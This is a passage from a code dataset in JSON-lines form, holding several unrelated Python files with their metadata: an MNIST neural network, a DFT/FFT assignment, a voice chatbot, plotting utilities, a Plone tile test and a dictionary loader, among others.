MessageParser()\r\n\r\n _excel_data.reverse()\r\n for _data in _excel_data:\r\n weight = int(_data[1]) if _data[1] else 1\r\n msg = _data[2]\r\n if not msg:\r\n continue\r\n status = int(_data[3])\r\n is_deleted = status > 0 if status else False\r\n text, lv, anchor = _message_parser.parse(msg)\r\n\r\n if anchor == 0:\r\n _transed = translate_by_string(text)\r\n _pinyin_text = ''.join(_transed).replace('_', '')\r\n # print('text: ', text)\r\n # print('_transed: ', _transed)\r\n if len(_pinyin_text) == 1:\r\n _pinyin_text = '_'\r\n else:\r\n _pinyin_text = re.sub(r'\\d+', '_', _pinyin_text)\r\n \r\n _check = _checking_map.get(_pinyin_text, None)\r\n if _check:\r\n _check_is_deleted = _check[2] > 0\r\n if _check_is_deleted != is_deleted:\r\n # continue\r\n _has_duplicate = True\r\n _against_idx = _check[0]\r\n _against_msg = _check[1]\r\n print('Duplicate MSG [{}], idx: {} || against idx: {}, msg: [{}]'.format(msg, _idx, _against_idx, _against_msg))\r\n \r\n else:\r\n \r\n _checking_map[_pinyin_text] = [_idx, msg, is_deleted]\r\n\r\n _r_idx = self.find_index_of_rlist(msg, 
result_list)\r\n \r\n if _r_idx >= 0:\r\n if result_list[_r_idx][3] == status:\r\n result_list[_r_idx][1] += weight\r\n else:\r\n print('Confusion Data Index: {} Msg: {}'.format(_r_idx, result_list[_r_idx][2]))\r\n print(':: Override By Result: [{}] [{}] Weight: {}'.format(msg, status, weight))\r\n # _has_duplicate = True\r\n # later records override earlier ones, then reinforce the weight\r\n result_list[_r_idx][3] = status\r\n result_list[_r_idx][1] = weight * weight\r\n else:\r\n weight += 3\r\n result_list.append(['', weight, msg, status])\r\n\r\n _idx += 1\r\n\r\n if _has_duplicate:\r\n\r\n print('Stop.')\r\n\r\n else:\r\n print('_excel_data length: ', len(_excel_data))\r\n print('result_list length: ', len(result_list))\r\n print('output_path: ', output_path)\r\n\r\n _jp = JsonParser(file=output_path)\r\n _jp.save(result_list)\r\n \r\n except Exception as err:\r\n print(err)\r\n\r\n\r\n ","sub_path":"service/management/commands/parsexcel.py","file_name":"parsexcel.py","file_ext":"py","file_size_in_byte":6796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"310488012","text":"num_list = range(1, 500)\nvar = int(input('Enter a number: '))\nvar3 = 0\n\nfor x in num_list:\n var2 = var/x\n if var2.is_integer() == True:\n var3 = var3 + 1\n print('Divisor ' + str(var3) + ' for ' + str(var) + ' is ' + str(var2))\n\nprint(str(var3) + ' Total divisors for ' + str(var))\n\n","sub_path":"python new/pyTest/exercise5.py","file_name":"exercise5.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"486079522","text":"import numpy as np\nimport mnist as mn\n\n# PREPARING THE VARIABLES\n\neig_vec = np.genfromtxt('eig_vec.csv', delimiter = ',')\n\n#-------------\n\nimages = mn.train_images()\nimages = images.reshape(60000,784)\nimages = images[:60000]\nimages = np.dot(eig_vec.T, images.T)\n \nimages = images.T\nimages = images/np.std(images)\n\n#-------------\n\nint_labels = mn.train_labels()\nint_labels = int_labels[:60000] # change this to the same number used for images\ntemp = [0,0,0,0,0,0,0,0,0]\nlabels = []\n\n\nfor i in range(len(int_labels)): # couldn't find a cleaner way to do this :)\n temp.insert(int_labels[i], 1)\n labels.append(temp)\n temp = [0,0,0,0,0,0,0,0,0]\n\nfor k in range(images.shape[0]):\n l = 0\n for l in range(images.shape[1]):\n if images[k][l] > 0.6:\n images[k][l] = 1\n elif images[k][l] >= -0.6 and images[k][l] <= 0.6:\n images[k][l] = 0\n elif images[k][l] < 0.6:\n images[k][l] = 0\n\n#=============================\n\n# FILE-WRITING FUNCTIONS\n\ndef write_data_append(file_name, data):\n \n with open(file_name, 'ab') as fn:\n \n np.savetxt(fn, data, delimiter = ',')\n \ndef write_data(txt_file, data):\n \n data = np.real(data)\n np.savetxt(txt_file, data, delimiter = ',')\n\n#========================\n\n# ACTIVATION AND ITS DERIVATIVE (NORMALIZE THE DATA, THEN APPLY TANH OR SIGMOID)\n\ndef tanhf(x):\n return np.tanh(x)\n\ndef d_tanhf(x):\n return 1 - pow(x,2)\n\n#===========================\n\n\n# SETTING THE IMPORTANT VARIABLES\n\nin_neurons = images.shape[1] # this will change as I vary the number of eigenvectors\n\nout_neurons = 10\n\nhidden_neurons = 10 # try different sizes ((in + out neurons) / 2)\n\nlearn_rate = 0.01 # tune this (the step size taken down the slope of the loss function)\n\n#learn_iter_iter = 5\n\nlearn_iter = 10000 # CHANGE ME TO A LARGE NUMBER\n\n#============================\n\n\n# RANDOM WEIGHTS AND BIASES\n\nw_h = 
np.random.uniform(size = (in_neurons, hidden_neurons)) # maybe this is transposed (it is not)\nb_h = np.random.uniform(size = (1, hidden_neurons)) # and this too\n\nw_o = np.random.uniform(size = (hidden_neurons, out_neurons))\nb_o = np.random.uniform(size = (1, out_neurons))\n\n#========================\n\n\n\n\n# TRAINING AND CROSS-VALIDATION\n\nj = 0\n\nfor j in range(int(images.shape[0]/10000)): # set this to 10000 and keep the others in sync\n \n print(j)\n rez = []\n i = 0\n# print(images.shape)\n# \n# images = mn.train_images()\n# images = images.reshape(60000,784)\n# images = images[:600]\n# images = np.dot(eig_vec.T, images.T)\n# print(images.shape) \n# \n# images = images.T\n# print(images.shape)\n# images = images/np.std(images)\n \n \n int_labels = mn.train_labels()\n int_labels = int_labels[:60000] # change this to the same number used for images\n temp = [0,0,0,0,0,0,0,0,0]\n labels = []\n\n\n for o in range(len(int_labels)): # couldn't find a cleaner way to do this :)\n temp.insert(int_labels[o], 1)\n labels.append(temp)\n temp = [0,0,0,0,0,0,0,0,0]\n \n \n if j == 0:\n images = images[10000:]\n labels = labels[10000:]\n \n elif j == 5:\n images = images[:50000]\n labels = labels[:50000]\n \n else:\n images = np.concatenate((images[:j*10000], images[(j+1)*10000:]))\n labels = np.concatenate((labels[:j*10000], labels[(j+1)*10000:]))\n\n\n for k in range(images.shape[0]):\n l = 0\n for l in range(images.shape[1]):\n if images[k][l] > 0.6:\n images[k][l] = 1\n elif images[k][l] >= -0.6 and images[k][l] <= 0.6:\n images[k][l] = 0\n elif images[k][l] < 0.6:\n images[k][l] = 0\n \n print(images.shape)\n \n while i < learn_iter:\n \n i += 1\n \n # forward feed\n \n hidden_input = np.dot(images, w_h) + b_h\n \n #hidden_input = hidden_input/1000 # data normalization: value/mean (np.std(hidden_input))\n\n hidden_activation = tanhf(hidden_input)\n\n #---\n \n out_input = np.dot(hidden_activation, w_o) + b_o\n\n output = tanhf(out_input)\n\n #------------------------\n\n # backpropagation\n\n Loss_out = labels - output\n \n #---\n\n out_slope = d_tanhf(output)\n \n hidden_slope = d_tanhf(hidden_activation)\n\n #---\n\n out_delta = Loss_out * out_slope\n\n #---\n \n Loss_hidden = np.dot(out_delta, w_o.T)\n\n #---\n\n hidden_delta = Loss_hidden * hidden_slope\n \n #--------\n \n w_o += np.dot(hidden_activation.T, out_delta) * learn_rate\n \n w_h += np.dot(images.T, hidden_delta) * learn_rate\n\n #---\n \n b_o += np.sum(out_delta, axis = 0) * learn_rate\n b_h += np.sum(hidden_delta, axis = 0) * learn_rate\n \n #=================\n \n \n #GUESS (for practice)\n \n if ((i/(learn_iter/10)).is_integer() == True) and (i/(learn_iter/10) != 0.0): # change both numbers to learn_iter/10\n\n temp = [np.argmax(output[j]) == np.argmax(labels[j]) for j in range(len(images))]\n # is a one-line for loop faster than a multi-line one?\n \n rez.append((np.count_nonzero(np.array(temp) == True) / len(images) * 100, i))\n \n \n write_data('Out_weights-{}-{}.csv'.format(j,i), w_o)\n write_data('Hidden_weights-{}-{}.csv'.format(j,i), w_h)\n write_data_append('Pcnt_iter.csv', np.array(rez))\n rez = []\n write_data('Out_bias-{}-{}.csv'.format(j,i), b_o)\n write_data('Hidden_bias-{}-{}.csv'.format(j,i), b_h)\n\n\n print('\\r{} / {}'.format(i,learn_iter), end = '\\r')\n \n print(images.shape)\n \n images = mn.train_images()\n images = images.reshape(60000,784)\n images = images[:60000]\n images = np.dot(eig_vec.T, images.T)\n print(images.shape) \n \n images = images.T\n print(images.shape)\n images = 
images/np.std(images)\n#===================================\n\n\n\n","sub_path":"NN_cv.py","file_name":"NN_cv.py","file_ext":"py","file_size_in_byte":6094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"118306435","text":"import numpy as np\n\n\ndef dft_matrix(n: int) -> np.ndarray:\n \"\"\"\n Construct DFT matrix of size n.\n\n Arguments:\n n: size of DFT matrix\n\n Return:\n F: DFT matrix of size n\n\n Forbidden:\n - numpy.fft.*\n \"\"\"\n # initialize matrix with proper size\n F = np.zeros((n, n), dtype='complex128')\n\n # create principal term for DFT matrix\n\n w = np.exp((2 * np.pi * (-1j)) / n)\n # fill matrix with values\n for i in range(0, n):\n F[[0], [i]] = 1\n F[[i], [0]] = 1\n for i in range(1, n):\n for j in range(1, n):\n F[[i], [j]] = w ** (i * j)\n # normalize dft matrix\n normalize = 1 / np.sqrt(n)\n F = normalize * F\n\n return F\n\n\ndef is_unitary(matrix: np.ndarray) -> bool:\n \"\"\"\n Check if the passed in matrix of size (n times n) is unitary.\n\n Arguments:\n matrix: the matrix which is checked\n\n Return:\n unitary: True if the matrix is unitary\n \"\"\"\n\n # check that F is unitary, if not return false\n\n Imatrix = np.eye(len(matrix), dtype=int)\n\n ConjMatrix = np.matrix.conjugate(matrix)\n TransposeMatrix = ConjMatrix.T\n product = np.dot(TransposeMatrix, matrix)\n unitary = np.allclose(product, Imatrix)\n\n return unitary\n\n\ndef create_harmonics(n: int = 128) -> (list, list):\n \"\"\"\n Create delta impulse signals and perform the fourier transform on each signal.\n\n Arguments:\n n: the length of each signal\n\n Return:\n sigs: list of np.ndarrays that store the delta impulse signals\n fsigs: list of np.ndarrays with the fourier transforms of the signals\n \"\"\"\n\n # list to store input signals to DFT\n sigs = []\n # Fourier-transformed signals\n fsigs = []\n # create signals and extract harmonics out of DFT matrix\n for i in range(0, n):\n e = np.zeros(n)\n e[i] = 1\n sigs.append(e)\n matrix = dft_matrix(n)\n product = np.dot(matrix, e)\n fsigs.append(product)\n\n return sigs, fsigs\n\n\ndef shuffle_bit_reversed_order(data: np.ndarray) -> np.ndarray:\n \"\"\"\n Shuffle elements of data using bit reversal of list index.\n\n Arguments:\n data: data to be transformed (shape=(n,), dtype='float64')\n\n Return:\n data: shuffled data array\n \"\"\"\n dataCopy = np.copy(data)\n i = 0\n while i < len(data):\n binaryIndex = bin(i).replace('0b', '')\n while len(binaryIndex) < np.log2([len(data)]):\n binaryIndex = '0' + binaryIndex\n binaryIndex = ''.join(reversed(binaryIndex))\n\n dataCopy[int(binaryIndex, 2)] = data[i]\n i = i + 1\n\n data = dataCopy\n\n return data\n\n\ndef fft(data: np.ndarray) -> np.ndarray:\n \"\"\"\n Perform real-valued discrete Fourier transform of data using fast Fourier transform.\n\n Arguments:\n data: data to be transformed (shape=(n,), dtype='float64')\n\n Return:\n fdata: Fourier transformed data\n\n Note:\n This is not an optimized implementation but one to demonstrate the essential ideas\n of the fast Fourier transform.\n\n Forbidden:\n - numpy.fft.*\n \"\"\"\n fdata = np.asarray(data, dtype='complex128')\n n = fdata.size\n if not n > 0 or (n & (n - 1)) != 0:\n raise ValueError\n\n # first step of FFT: shuffle data\n data = shuffle_bit_reversed_order(data)\n\n fdata = np.asarray(data, dtype='complex128')\n\n m = 0\n highTree = 0\n high = n\n while high > 1:\n high = high / 2\n highTree = highTree + 1\n\n while m < int(highTree):\n for k in range(0, 2 ** m):\n transformations 
= 0\n counter = 0\n while transformations < int(n / (2 ** (m + 1))):\n transformations = transformations + 1\n i = k + counter * (2 ** (m + 1))\n j = k + counter * (2 ** (m + 1)) + 2 ** m\n omega = (np.exp((-2 * np.pi * (1j) * k) / (2 ** (m + 1)))) * fdata[j]\n fdata[j] = fdata[i] - omega\n fdata[i] = fdata[i] + omega\n counter = counter + 1\n\n m = m + 1\n\n fdata = fdata / (np.sqrt(n))\n\n return fdata\n\n\ndef generate_tone(f: float = 261.626, num_samples: int = 44100) -> np.ndarray:\n \"\"\"\n Generate tone of length 1s with frequency f (default mid C: f = 261.626 Hz) and return the signal.\n\n Arguments:\n f: frequency of the tone\n\n Return:\n data: the generated signal\n \"\"\"\n\n # sampling range\n x_min = 0.0\n j = 0\n\n data = np.linspace(x_min, 2 * np.pi, num_samples)\n\n while j < num_samples:\n data[j] = np.sin(data[j] * f)\n\n j = j + 1\n\n return data\n\n\ndef low_pass_filter(adata: np.ndarray, bandlimit: int = 1000, sampling_rate: int = 44100) -> np.ndarray:\n \"\"\"\n Filter high frequencies above bandlimit.\n\n Arguments:\n adata: data to be filtered\n bandlimit: bandlimit in Hz above which to cut off frequencies\n sampling_rate: sampling rate in samples/second\n\n Return:\n adata_filtered: filtered data\n \"\"\"\n\n # translate band limit from Hz to data index according to sampling rate and data size\n bandlimit_index = int(bandlimit * adata.size / sampling_rate)\n\n # compute Fourier transform of input data\n newAdata = np.fft.fft(adata)\n # set high frequencies above band limit to zero, make sure the almost symmetry of the transform is respected.\n newAdata[bandlimit_index + 1: len(newAdata) - bandlimit_index] = 0\n # compute inverse transform and extract real component\n adata_filtered = np.fft.ifft(newAdata)\n adata_filtered = np.real(adata_filtered)\n\n return adata_filtered\n\n\nif __name__ == '__main__':\n print(\"All requested functions for the assignment have to be implemented in this file and uploaded to the \"\n \"server for the grading.\\nTo test your implemented functions you can \"\n \"implement/run tests in the file tests.py (> python3 -v test.py [Tests.]).\")\n","sub_path":"Project5/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"179540387","text":"# n = 23\n# a,b,c = 11,12,9\n\n# Negative Case\n# n = 9\n# a,b,c = 2,2,2\n\n#Find the maximum number of pieces of n, that can be made suing these three length sizes a,b,c\n\nn = 5\na,b,c = 2,5,1\n\ndef helper(n,arr,res):\n if n == 0:\n res.append(arr)\n return res\n \n if n < 0:\n return res\n\n for x in [a,b,c]:\n helper(n - x, arr + [x], res)\n\n return res\n\nres = []\nhelper(n,[],res)\nprint(res)","sub_path":"Recursion/ropeCutting.py","file_name":"ropeCutting.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"630026599","text":"# -*- coding: utf-8 -*-\nfrom brasil.gov.tiles.testing import INTEGRATION_TESTING\nfrom brasil.gov.tiles.tiles.banner_rotativo import BannerRotativoTile\nfrom collective.cover.tiles.base import IPersistentCoverTile\nfrom plone.app.testing import setRoles\nfrom plone.app.testing import TEST_USER_ID\nfrom zope.component import getMultiAdapter\nfrom zope.interface.verify import verifyClass\nfrom zope.interface.verify import verifyObject\n\nimport unittest\n\n\nclass BannerRotativoTileTestCase(unittest.TestCase):\n\n layer = INTEGRATION_TESTING\n\n def 
setUp(self):\n self.portal = self.layer['portal']\n setRoles(self.portal, TEST_USER_ID, ['Manager'])\n self.request = self.layer['request']\n self.name = u\"banner_rotativo\"\n self.cover = self.portal['frontpage']\n self.tile = getMultiAdapter((self.cover, self.request), name=self.name)\n self.tile = self.tile['test']\n\n def test_interface(self):\n self.assertTrue(IPersistentCoverTile.implementedBy(BannerRotativoTile))\n self.assertTrue(verifyClass(IPersistentCoverTile, BannerRotativoTile))\n\n tile = BannerRotativoTile(None, None)\n self.assertTrue(IPersistentCoverTile.providedBy(tile))\n self.assertTrue(verifyObject(IPersistentCoverTile, tile))\n\n def test_default_configuration(self):\n self.assertFalse(self.tile.is_configurable)\n self.assertTrue(self.tile.is_droppable)\n self.assertTrue(self.tile.is_editable)\n\n def test_tile_is_empty(self):\n self.assertTrue(self.tile.is_empty())\n","sub_path":"src/brasil/gov/tiles/tests/test_bannerrotativo_tile.py","file_name":"test_bannerrotativo_tile.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"221408732","text":"import pyttsx3\nimport webbrowser\nimport smtplib\nimport random\nimport speech_recognition as sr\nimport wikipedia\nimport datetime\nimport time\n#youtubeimport wolframalpha\nimport os\nimport sys\nimport nltk\nimport io\nimport numpy as np\nimport random\nimport string\n#import sklern\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n#for opening and reading the file\ndef chatbot():\n engine = pyttsx3.init('espeak')\n\n def speak(audio):\n print('Computer: ' + audio)\n engine.say(audio)\n engine.runAndWait()\n\n path = '/home/p/Desktop/chatbot/pavan2.txt'\n f = open(path, 'r', errors='ignore')\n raw = f.read()\n raw = raw.lower() # converts to lower case\n # punkt and wordnet should be downloaded\n # nltk.download('punkt')#punkt used to convert the list of words to strings\n # nltk.download('wordnet')#used as a dictionary where nltk find meanings and synonyms\n sent_tokens = nltk.sent_tokenize(raw) # converts to list of sentenses\n word_tokens = nltk.word_tokenize(raw) # converts to list of words\n # for testing the sent_tokens and word_tokens\n '''a = word_tokens[:2]\n print(a)\n b = sent_tokens[:2]\n print(b)\n '''\n\n # preprossesing of text\n lemmer = nltk.stem.WordNetLemmatizer()\n\n # word net is an dictionary of english which is included in the nltk\n def LemTokens(tokens):\n return [lemmer.lemmatize(token) for token in tokens]\n\n remove_punct_dict = dict((ord(punct), None) for punct in string.punctuation)\n\n def LemNormalize(text): # here text is the user input\n return LemTokens(nltk.word_tokenize(text.lower().translate(remove_punct_dict)))\n\n # greeting\n GREETING_INPUT = (\"hello\", \"hai\", \"hi\", \"sup\", \"greetings\", \"hey\", \"what'sap\",)\n GREETING_OUTPUT = [\"hai\", \"hi\", \"hello\", \"hi there\", \"i am gland you are taking to me\"]\n\n def greeting(sentence):\n for word in sentence.split():\n if word.lower() in GREETING_INPUT:\n return random.choice(GREETING_OUTPUT)\n\n # vectorization for this we need to modules Tfidvectorizer and cosine_similarity\n # defining response\n def response(user_response):\n\n chatbot_response = ''\n sent_tokens.append(user_response)\n TfidVec = TfidfVectorizer(tokenizer=LemNormalize, stop_words='english')\n tfidf = TfidVec.fit_transform(\n sent_tokens) 
# calling fit transform method and passing the sent tokens here the send tokens are converted into a vector form\n vals = cosine_similarity(tfidf[-1],\n tfidf) # consine similarity for finding the similarity between the sentense tokens and user quations\n idx = vals.argsort()[0][-2]\n flat = vals.flatten() # for finding the matching btween quations and data stored in txt and converts it into a row matrix\n flat.sort()\n req_tfidf = flat[-2]\n if (req_tfidf != 0): # it means there is nothing matching between the quation and data\n chatbot_response = chatbot_response + sent_tokens[idx]\n return chatbot_response\n else:\n chatbot_response = chatbot_response + \" i am sorry idont understand you\"\n return chatbot_response\n\n flag = True\n print(\"chatbot:My name is chatbot.I will answer your quaries about global warming. if you want to exit ,type bye\")\n while (flag == True):\n r = sr.Recognizer()\n # url2 = 'https://www.youtube.com/'\n\n with sr.Microphone() as source:\n print(\"Listening...\")\n r.pause_threshold = 1\n url = r.listen(source)\n # get = str(input('Command: '))\n user_response = r.recognize_google(url, language='en')\n\n user_response = user_response.lower()\n if (user_response != 'bye' or 'exit'):\n if (user_response == 'thanks' or user_response == 'thank you'):\n flag = False\n print(\"chatbot:you are welcome..\")\n else:\n if (greeting(user_response) != None):\n print(\"chatbot:\" + greeting(user_response))\n else:\n print(\"chatbot:\", end=\"\")\n print(response(user_response))\n speak(response(user_response))\n\n sent_tokens.remove(user_response)\n else:\n flag = False\n print(\"chatbot: Bye! take care..\")\n # time.sleep(20)\nchatbot()","sub_path":"chatbot.py","file_name":"chatbot.py","file_ext":"py","file_size_in_byte":4537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"490474158","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function, division\n\nimport tensorflow as tf\nimport numpy as np\nimport scipy.ndimage\nimport progressbar\n\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\n\n\ndef get_training_progressbar_fn(n_steps, loss_history, opt):\n widgets = [\n progressbar.Bar(),\n progressbar.Percentage(), ' |',\n progressbar.Timer(format='Elapsed: %(elapsed)s'), '|',\n progressbar.AdaptiveETA(), '|',\n progressbar.Variable('loss', width=6, precision=4), ', ',\n progressbar.Variable('lr', width=8, precision=3)\n ]\n bar = progressbar.ProgressBar(max_value=n_steps, widgets=widgets)\n\n def update_progressbar(i):\n loss = np.mean(loss_history[-50:])\n lr = float(opt._decayed_lr(tf.float32))\n bar.update(i+1, loss=loss, lr=lr)\n\n return update_progressbar\n\n\ndef plot_loss(loss_hist, val_loss_hist=None, lr_hist=None, smoothing='auto'):\n if smoothing == 'auto':\n n_smooth = np.clip(len(loss_hist)//16, 4, 128)\n else:\n n_smooth = smoothing\n\n def smooth_time_series(x):\n w = np.kaiser(2*n_smooth,5)\n w /= np.sum(w)\n x_conv = scipy.ndimage.convolve(x, w, mode='reflect')\n return x_conv\n\n loss_conv = smooth_time_series(loss_hist)\n if val_loss_hist is not None:\n val_loss_conv = smooth_time_series(val_loss_hist)\n\n n = np.arange(len(loss_hist))\n\n # Detect discrete drops in learning rate\n if lr_hist is not None:\n lr_hist = np.array(lr_hist)\n lr_ratio = lr_hist[1:] / lr_hist[:-1]\n n_drop = np.where(lr_ratio < 0.95)[0]\n\n fig,ax_arr = plt.subplots(1,2, figsize=(8,4))\n fig.subplots_adjust(\n left=0.14,\n right=0.98,\n wspace=0.25\n )\n\n for i,ax in 
enumerate(ax_arr):\n if i == 1:\n i0 = len(loss_hist) // 2\n loss_hist = loss_hist[i0:]\n loss_conv = loss_conv[i0:]\n if val_loss_hist is not None:\n val_loss_conv = val_loss_conv[i0:]\n if lr_hist is not None:\n lr_hist = lr_hist[i0:]\n n = n[i0:]\n\n if lr_hist is not None:\n for k in n_drop:\n ax.axvline(k, c='k', alpha=0.1, ls='--')\n\n l, = ax.plot(n, loss_hist, alpha=0.1, label=r'loss')\n ax.plot(\n n, loss_conv,\n alpha=0.8,\n color=l.get_color(),\n label=r'$\\mathrm{loss\\ (smoothed)}$'\n )\n if val_loss_hist is not None:\n ax.plot(\n n, val_loss_conv,\n alpha=0.8,\n label=r'$\\mathrm{validation\\ loss\\ (smoothed)}$'\n )\n\n ax.set_xlim(n[0], n[-1])\n\n ax.grid('on', which='major', alpha=0.25)\n ax.grid('on', which='minor', alpha=0.05)\n ax.set_ylabel(r'$\\mathrm{loss}$')\n ax.set_xlabel(r'$\\mathrm{training\\ step}$')\n if i == 0:\n ax.legend(loc='upper right')\n\n return fig\n\n\ndef batch_function(f, batch_size, base_library=tf):\n def g(x, *args, **kwargs):\n o = []\n n_data = x.shape[0]\n for batch in base_library.split(x, range(0,n_data,batch_size)):\n o.append(f(batch, *args, **kwargs))\n #for k in range(0, n_data, batch_size):\n # b0,b1 = k, k+batch_size\n # o.append(f(x[b0:b1], *args, **kwargs))\n return base_library.concatenate(o)\n\n\ndef append_to_loss_history(fname, key, loss_history):\n s = f'# {key}\\n'\n s += ' '.join(f'{x}' for x in loss_history) + '\\n'\n with open(fname, 'a') as f:\n f.write(s)\n ## Read existing data from JSON\n #if os.path.isfile(fname):\n # with open(fname, 'r') as f:\n # d = json.load(f)\n #else:\n # d = {}\n ## Append new data\n #d[key] = list(loss_history)\n ## Re-write data to JSON\n #with open(fname, 'w') as f:\n # f.dump(d, f)\n\n\ndef save_loss_history(fname, loss_history, val_loss_history=None, lr_history=None):\n data = [loss_history]\n header = f'{\"loss\": >16s}'\n if val_loss_history is not None:\n data.append(val_loss_history)\n header += f' {\"validation_loss\": >18s}'\n if val_loss_history is not None:\n data.append(lr_history)\n header += f' {\"learning_rate\": >18s}'\n data = np.stack(data, axis=1)\n np.savetxt(fname, data, header=header, fmt='%.12e')\n\n\ndef load_loss_history(fname):\n data = np.loadtxt(fname)\n loss_history = data[:,0].tolist()\n val_loss_history = data[:,1].tolist()\n lr_history = data[:,2].tolist()\n return loss_history, val_loss_history, lr_history\n\n\ndef plot_corr(ax, x, y,\n x_lim=None, d_max=None,\n bins=(50,31), pct=(16,50,84),\n normalization='balanced'):\n if x_lim is None:\n x_min, x_max = np.min(x), np.max(x)\n # w = x_max - x_min\n xlim = (x_min, x_max)\n else:\n xlim = x_lim\n\n if d_max is None:\n dmax = 1.2 * np.percentile(np.abs(y-x), 99.9)\n else:\n dmax = d_max\n dlim = (-dmax, dmax)\n\n d = y - x\n n,x_edges,_ = np.histogram2d(x, d, range=(xlim, dlim), bins=bins)\n\n if normalization == None:\n norm = np.ones(n.shape[0])\n elif normalization == 'sum':\n norm = np.sum(n, axis=1) + 1.e-10\n elif normalization == 'max':\n norm = np.max(n, axis=1) + 1.e-10\n elif normalization == 'balanced':\n norm0 = np.sum(n, axis=1)\n norm1 = np.max(n, axis=1)\n norm = np.sqrt(norm0*norm1) + 1.e-10\n else:\n raise ValueError(f'Unrecognized normalization: \"{normalization}\"')\n n /= norm[:,None]\n\n #n = n**gamma\n\n ax.imshow(\n n.T,\n origin='lower',\n interpolation='nearest',\n aspect='auto',\n extent=xlim+dlim,\n cmap='binary'\n )\n ax.plot(xlim, [0.,0.], c='b', alpha=0.2, lw=1)\n\n if len(pct):\n x_pct = np.empty((3, len(x_edges)-1))\n for i,(x0,x1) in enumerate(zip(x_edges[:-1],x_edges[1:])):\n 
idx = (x > x0) & (x < x1)\n if np.any(idx):\n x_pct[:,i] = np.percentile(d[idx], pct)\n else:\n x_pct[:,i] = np.nan\n \n for i,x_env in enumerate(x_pct):\n ax.step(\n x_edges,\n np.hstack([x_env[0], x_env]),\n c='cyan',\n alpha=0.5\n )\n\n ax.set_xlim(xlim)\n ax.set_ylim(dlim)\n\n\ndef hist2d_mean(ax, x, y, c,\n vmin=None, vmax=None, cmap=None,\n bins=10, range=None):\n kw = dict(bins=bins, range=range, density=False)\n nc,xedges,yedges = np.histogram2d(x, y, weights=c, **kw)\n n,_,_ = np.histogram2d(x, y, **kw)\n img = nc / n\n\n extent = (\n xedges[0], xedges[-1],\n yedges[0], yedges[-1]\n )\n\n im = ax.imshow(\n img.T,\n extent=extent,\n origin='lower',\n aspect='auto',\n interpolation='nearest',\n vmin=vmin,\n vmax=vmax,\n cmap=cmap\n )\n\n return im\n\n\ndef main():\n rng = np.random.default_rng()\n\n x = [rng.uniform(0., 0.1, 1000), rng.uniform(0., 1.0, 1000)]\n y = [rng.uniform(0., 1.0, 1000), rng.uniform(0., 0.1, 1000)]\n c = [np.ones(1000), -1 * np.ones(1000)]\n\n x = np.hstack(x)\n y = np.hstack(y)\n c = np.hstack(c)\n\n fig,ax = plt.subplots(1,1, figsize=(4,3), dpi=200)\n\n im = hist2d_mean(\n ax, x, y, c,\n vmin=-1, vmax=1,\n cmap='coolwarm_r',\n bins=10, range=[(0,1),(0,1)]\n )\n\n fig.colorbar(im, ax=ax)\n\n fig.savefig('hist2d_mean_example.png', dpi=200)\n\n return 0\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"scripts/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"510798146","text":"# coding: utf8\nfrom __future__ import unicode_literals\nimport re\nfrom datetime import date\n\nfrom sqlalchemy import create_engine\nfrom path import path\nfrom clld.db.meta import DBSession\nfrom clld.db.models import common\nfrom clld.util import slug\n\nimport dictionaria\nfrom dictionaria import models\nfrom dictionaria.lib.sfm import Dictionary\n\n\nDB = 'postgresql://robert@/wold'\nPOS_MAP = {\n 'n adj': 'noun',\n 'vi': 'inactive verb',\n 'num': 'numeral',\n 'vt': 'transitive verb',\n 'conj': 'other',\n 'vt vi': 'verb',\n 'adv': 'adverb',\n 'pron': 'pronoun',\n 'neg': 'other',\n 'pron (resp)': 'pronoun',\n 'deic': 'other',\n 'quant': 'other',\n 'adj': 'adjective',\n 'prep': 'other',\n 'qmrk': 'other',\n 'wh': 'other',\n 'Q': 'other',\n 'part': 'other',\n 'vdt': 'other',\n 'det': 'other',\n 'n': 'noun',\n 'q': 'other',\n 'pron (conf)': 'pronoun',\n 'v': 'verb',\n}\n\n\ndef load(id_, data):\n d = Dictionary(path(__file__).dirname().joinpath('yalalag.bak'), encoding='latin1')\n d.entries = filter(lambda r: r.get('lx') and r.get('ge'), d.entries)\n\n lang = data.add(common.Language, id_, id=id_, name='Yalálag Zapotec',\n latitude=17.18574, longitude=-96.17891)\n #\n # TODO:\n #\n # iso code zpu\n contrib = data.add(\n common.Contributor, 'heriberto', id='avelinoheriberto', name='Heriberto Avelino')\n DBSession.flush()\n\n number = max([int(dd.id) for dd in data['Dictionary'].values()] + [0])\n vocab = data.add(\n models.Dictionary, id_, id=str(number + 1),\n name='Yalálag Zapotec Dictionary',\n language=lang,\n published=date(2013, 5, 5))\n DBSession.flush()\n\n DBSession.add(common.Contribution_files(\n object_pk=vocab.pk,\n name='description',\n file=common.File(\n name='yalalag.pdf',\n mime_type='application/pdf',\n content=open(path(__file__).dirname().joinpath('yalalag.pdf')).read())))\n\n old_db = create_engine(DB)\n for row in old_db.execute(\"select * from meaning\"):\n data.add(\n common.ValueSet, '%s-%s' % (row['label'].lower(), id_),\n 
